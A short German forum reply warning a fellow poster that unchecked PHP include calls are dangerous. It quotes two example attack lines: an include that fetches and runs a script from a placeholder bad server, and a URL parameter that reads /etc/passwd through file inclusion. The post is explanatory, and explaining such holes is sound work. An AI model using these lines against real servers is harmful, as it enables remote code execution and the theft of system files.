Zitat von
omata:
Wenn man
HTML und PHP Code nicht mischt sondern alles in PHP codet. Das heisst es gibt keine echos oder sonstige Ausgaben in den includeten Dateien und man schreibt alles objectorientiert, dann kann man ruhig eine dieser Dateien aufrufen. Im Browser kommt dann nur noch eine leere Seite an.
Das ist ja nicht das Problem. Das Problem ist, dass du alles moegliche includen kannst. Nehmen wir mal sowas:
Code:
include('http://badserver.tld/badscript.txt');
Der Code ladet bei aktivem allow_url_fopen den Inhalt von badscript.txt und fuehrt ihn anschliessend aus. Das ist...suboptimal.
Ein weiteres Problem:
Code:
mypage.php?include=/etc/passwd
Bei einem nicht optimal konfigurierten Server (und das kommt leider oefter vor als man glauben will) kannst du dir vorstellen was da passiert...
Greetz
alcaeus